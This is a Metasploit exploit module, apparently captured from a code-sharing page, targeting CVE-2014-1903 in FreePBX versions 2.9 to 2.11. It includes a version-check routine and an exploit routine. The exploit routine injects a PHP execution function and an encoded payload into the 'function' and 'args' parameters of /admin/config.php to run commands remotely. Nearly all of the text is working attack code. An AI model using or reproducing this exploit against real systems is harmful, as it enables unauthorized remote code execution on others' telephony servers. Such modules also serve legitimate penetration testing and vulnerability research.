Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "FreePBX config.php Remote Code Execution",
14
      'Description'    => %q{
15
        This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
16
        It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
17
        parameters "function" and "args".
18
      },
19
      'License'        => MSF_LICENSE,
20
      'Author'         =>
21
        [
22
          'i-Hmx', # Vulnerability discovery
23
          '0x00string', # PoC
24
          'xistence <xistence[at]0x90.nl>' # Metasploit module
25
        ],
26
      'References'     =>
27
        [
28
          ['CVE', '2014-1903'],
29
          ['OSVDB', '103240'],
30
          ['EDB', '32214'],
31
          ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
32
        ],
33
      'Platform'       => 'unix',
34
      'Arch'           => ARCH_CMD,
35
      'Targets'        =>
36
        [
37
          ['FreePBX', {}]
38
        ],
39
      'Privileged'     => false,
40
      'DisclosureDate' => '2014-03-21',
41
      'DefaultTarget'  => 0))
42

43
      register_options(
44
        [
45
          OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])
46
        ])
47

48
      register_advanced_options(
49
        [
50
          OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])
51
        ])
52
  end
53

54

55
  def check
56
    vprint_status("Trying to detect installed version")
57

58
    res = send_request_cgi({
59
      'method' => 'GET',
60
      'uri'    => normalize_uri(target_uri.path, "admin", "CHANGES")
61
    })
62

63
    if res and res.code == 200 and res.body =~ /^(.*)$/
64
      version = $1
65
    else
66
      return Exploit::CheckCode::Unknown
67
    end
68

69
    vprint_status("Version #{version} detected")
70

71
    if version =~ /2\.(9|10|11)\.0/
72
      return Exploit::CheckCode::Appears
73
    else
74
      return Exploit::CheckCode::Safe
75
    end
76
  end
77

78
  def exploit
79
    rand_data = rand_text_alpha_lower(rand(10) + 5)
80

81
    print_status("Sending payload")
82
    res = send_request_cgi({
83
      'method' => 'GET',
84
      'uri'    => normalize_uri(target_uri.path, "admin", "config.php"),
85
      'vars_get' => {
86
        "display" => rand_data,
87
        "handler" => "api",
88
        "function" => datastore['PHPFUNC'],
89
        "args" => payload.encoded
90
      }
91
    })
92

93
    # If we don't get a 200 when we request our malicious payload, we suspect
94
    # we don't have a shell, either.
95
    if res and res.code != 200
96
      print_error("Unexpected response, exploit probably failed!")
97
    end
98

99
  end
100
end
101

102